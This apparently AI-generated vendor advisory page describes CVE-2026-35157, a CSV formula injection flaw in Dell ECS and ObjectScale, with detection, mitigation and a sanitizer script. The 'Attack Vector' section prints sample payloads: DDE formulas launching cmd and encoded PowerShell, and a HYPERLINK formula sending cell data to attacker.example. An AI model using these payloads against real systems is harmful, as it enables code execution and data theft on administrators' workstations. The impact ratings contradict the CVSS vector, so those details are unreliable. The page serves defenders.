The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-35157

CVE-2026-35157: Dell Elastic Cloud Storage RCE Vulnerability

CVE-2026-35157 is a remote code execution flaw in Dell Elastic Cloud Storage caused by CSV injection. Unauthenticated attackers can exploit this to execute code remotely. This article covers technical details, affected versions, and mitigation.

Published: May 18, 2026

CVE-2026-35157 Overview

CVE-2026-35157 is a CSV formula injection vulnerability affecting Dell Elastic Cloud Storage (ECS) and Dell ObjectScale. The flaw resides in the management user interface (UI), which fails to neutralize formula elements written into exported CSV files [CWE-1236]. An unauthenticated remote attacker can inject crafted payloads that execute when a privileged user opens the resulting CSV in a spreadsheet application. Successful exploitation can lead to remote code execution on the victim's workstation. Dell published advisory DSA-2026-047 covering this and related issues in ECS and ObjectScale.

Critical Impact

An unauthenticated network attacker can inject spreadsheet formulas that execute arbitrary commands when administrators open exported CSV data, compromising operator endpoints used to manage object storage clusters.

Affected Products

  • Dell ECS versions 3.8.1.0 through 3.8.1.7
  • Dell ObjectScale versions prior to 4.3.0.0
  • Dell Elastic Cloud Storage management UI components

Discovery Timeline

  • 2026-05-11 - CVE-2026-35157 published to NVD
  • 2026-05-12 - Last updated in NVD database

Technical Details for CVE-2026-35157

Vulnerability Analysis

The vulnerability stems from improper neutralization of formula elements in CSV files generated by the Dell ECS and ObjectScale UI. When user-controlled data is written into exported CSV reports, the application does not sanitize leading characters such as =, +, -, @, tab, or carriage return. Spreadsheet applications including Microsoft Excel and LibreOffice Calc interpret cells beginning with these characters as formulas. Attackers can therefore plant payloads through fields exposed in the UI without authentication, and those payloads execute when an administrator downloads and opens the CSV.

Formula injection can pivot from data ingestion into command execution via spreadsheet features such as DDE, HYPERLINK, WEBSERVICE, or IMPORTXML. The attacker leverages the trust placed in internal exports to reach administrator endpoints behind perimeter controls.

Root Cause

The root cause is missing output encoding when constructing CSV rows. The CSV writer concatenates field values directly without prefixing potentially dangerous values with a safe character such as a single quote or escaping the leading metacharacter. This matches [CWE-1236: Improper Neutralization of Formula Elements in a CSV File].

Attack Vector

The attack is network-based and requires no authentication or user interaction with the ECS UI itself. The attacker submits a crafted value through any input field that later appears in a CSV export, for example a bucket name, tag, user attribute, or log entry. When an operator exports the data and opens the file, the embedded formula executes in the context of the operator's workstation. See the Dell Security Update Advisory for vendor details.

Example payload pattern (do not execute):
=cmd|'/C calc'!A1
@SUM(1+1)*cmd|'/C powershell -enc <base64>'!A1
=HYPERLINK("http://attacker.example/?d="&A1,"Click")

These values, once stored in ECS or ObjectScale and later exported, become live formulas in the resulting spreadsheet.

Detection Methods for CVE-2026-35157

Indicators of Compromise

  • CSV exports from ECS or ObjectScale containing cells that begin with =, +, -, or @ followed by function names such as cmd, HYPERLINK, WEBSERVICE, or DDE.
  • Spreadsheet processes (excel.exe, soffice.bin) spawning cmd.exe, powershell.exe, wscript.exe, or mshta.exe on administrator endpoints.
  • Outbound HTTP or DNS requests from spreadsheet processes to unknown external hosts shortly after opening an exported report.

Detection Strategies

  • Inspect ECS and ObjectScale stored fields (bucket names, tags, user metadata, log messages) for entries whose first character is a CSV formula trigger.
  • Hunt endpoint telemetry for parent-child process relationships where Office or LibreOffice applications launch shells or scripting engines.
  • Correlate UI export events with subsequent process execution on the operator workstation to identify weaponized exports.

Monitoring Recommendations

  • Enable command-line logging and DNS query logging on workstations used to administer Dell ECS and ObjectScale.
  • Alert on spreadsheet applications initiating network connections to non-corporate destinations.
  • Track administrative actions in ECS and ObjectScale that produce CSV downloads, and review the exported content before distribution.

How to Mitigate CVE-2026-35157

Immediate Actions Required

  • Apply the fixes referenced in Dell advisory DSA-2026-047 for ECS and ObjectScale.
  • Restrict access to the ECS and ObjectScale management UI to trusted networks and authenticated administrators only.
  • Instruct administrators to avoid opening CSV exports directly and to inspect file contents in a text editor first.

Patch Information

Dell addresses CVE-2026-35157 in ObjectScale 4.3.0.0 and later, and in fixed releases for ECS beyond 3.8.1.7. Refer to the Dell Security Update Advisory DSA-2026-047 for the exact remediated builds and upgrade procedures.

Workarounds

  • Configure Microsoft Excel and LibreOffice Calc to disable Dynamic Data Exchange (DDE) and external content execution.
  • Import exported CSV files into spreadsheets using the text import wizard with all columns set to text, preventing formula evaluation.
  • Sanitize CSV exports downstream by prefixing any cell that begins with =, +, -, @, tab, or carriage return with a single quote.
bash
# Example sanitizer for ECS/ObjectScale CSV exports
awk 'BEGIN{FS=OFS=","} {
  for (i=1; i<=NF; i++) {
    if ($i ~ /^[=+\-@\t\r]/) { $i = "'\''" $i }
  }
  print
}' export.csv > export.sanitized.csv

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeRCE

  • Vendor/TechDell Elastic Cloud Storage

  • SeverityCRITICAL

  • CVSS Score9.8

  • EPSS Probability0.14%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityHigh
  • CWE References
  • CWE-1236
  • Vendor Resources
  • Dell Security Update Advisory
  • Related CVEs
  • CVE-2025-43992: Dell ECS Authentication Bypass Vulnerability

  • CVE-2026-26946: Dell ECS Privilege Escalation Vulnerability

  • CVE-2026-40636: Dell Elastic Cloud Storage Auth Bypass

  • CVE-2026-22274: Dell ECS Information Disclosure Flaw
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English